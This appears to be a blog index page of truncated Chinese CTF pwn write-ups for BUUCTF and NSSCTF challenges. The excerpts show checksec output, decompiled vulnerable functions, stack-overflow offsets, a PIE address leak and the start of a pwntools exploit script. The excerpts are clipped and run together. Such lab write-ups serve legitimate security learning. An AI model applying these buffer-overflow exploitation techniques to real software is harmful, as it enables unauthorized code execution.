FOR DREAM

32位开启了pie保护 IDA中值得注意的三个函数 vuln函数中return read(0, buf, 0x50u);栈溢出 offet = 0x28+0x8 由于开了pie保护 ida中的基本函数地址不可用 所以我们可以要算出函数的偏移 通过什么泄露呢？ 由于Partial RELRO got表可以泄露 能不能算出libc呢？ !他给了一个gift 每次运行都会泄露main的地址 1234OHHH!,give you a gift![DEBUG] Received 0x13 bytes: b'\n' b'0x565ef770\n' b'Input:\n' 1234OHHH!,give you a gift![DEBUG] Received 0x13 bytes: b'\n' b'0x565d8770\n' b'Input:\n' 通过ida可以知道 770是函数的偏移量 所以每次的基地址就是770前面的内容 ...

fun函数主要做了反转 可以看到 开了一堆保护 80%是直接在shell上做文章 可以看到这里并没有做任何过滤 所以我们直接 得到答案 很简单对吧

123456[*] '/mnt/e/work/PWN/buuctf/ciscn_2019_c_1/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ida64main123456789101112131415161718192021222324252627282930313233343536373839int __cdecl main(int argc, const char **argv, const char **envp){ int v4; // [rsp+Ch] [rbp-4h] BYREF init(); puts("EEEEEEE hh iii "); puts("EE ...

1234567└─# checksec pwn [*] '/mnt/e/work/PWN/buuctf/jarvisoj_level2_x64/pwn' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 狗屎开了NX 又是一眼shellcode不就是叫你踩坑吗 服了 IDA6412345int __cdecl main(int argc, const char **argv, const char **envp){ vulnerable_function(argc, argv, envp); return system("echo 'Hello World!'");} 1234567ssize_t vulnerable_function(){ char buf[128] ...

123456789101112131415161718192021222324from pwn import *from LibcSearcher import *context( terminal=["wt.exe","wsl"], os = "linux", arch = "amd64", #arch = "i386", log_level="debug",)elf = ELF("./pwn")io = process("./pwn")#io = remote("node4.anna.nssctf.cn",28444)def debug(): gdb.attach(io) pause()#debug()backdoor_addr = elf.sym['Xiao_Si']puts = elf.got['puts']offset ...

123456[*] '/mnt/e/work/PWN/nssctf/469_[2021 鹤城杯]babyof/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 64位直接扔ida64 开启了Partial RELRO和 NX ida64找到sub_400632 12345678int sub_400632()//注意是sub_400642并不是一个函数名 而是ida给他命名的{ char buf[64]; // [rsp+0h] [rbp-40h] BYREF puts("Do you know how to do buffer overflow?"); read(0, buf, 0x100uLL); return puts("I hope you win");} ...

123456[*] '/mnt/e/work/PWN/nssctf/100/[CISCN 2019华北]PWN1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ida64main1234567int __cdecl main(int argc, const char **argv, const char **envp){ setvbuf(_bss_start, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); func(); return 0;} 查看func() 12345678910111213int func(){ char v1[44]; // [rsp+0h] [rbp-30h] BYREF float v2; // [rsp+2Ch] [rb ...

[BJDCTF 2020]babystack2.0123456[*] '/mnt/e/work/PWN/nssctf/709_[BJDCTF 2020]babystack2.0/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ida6412345678910111213141516171819202122232425int __cdecl main(int argc, const char **argv, const char **envp){ char buf[12]; // [rsp+0h] [rbp-10h] BYREF size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF setvbuf(_bss_start, 0LL, 2, 0LL); setvbuf(stdin, 0 ...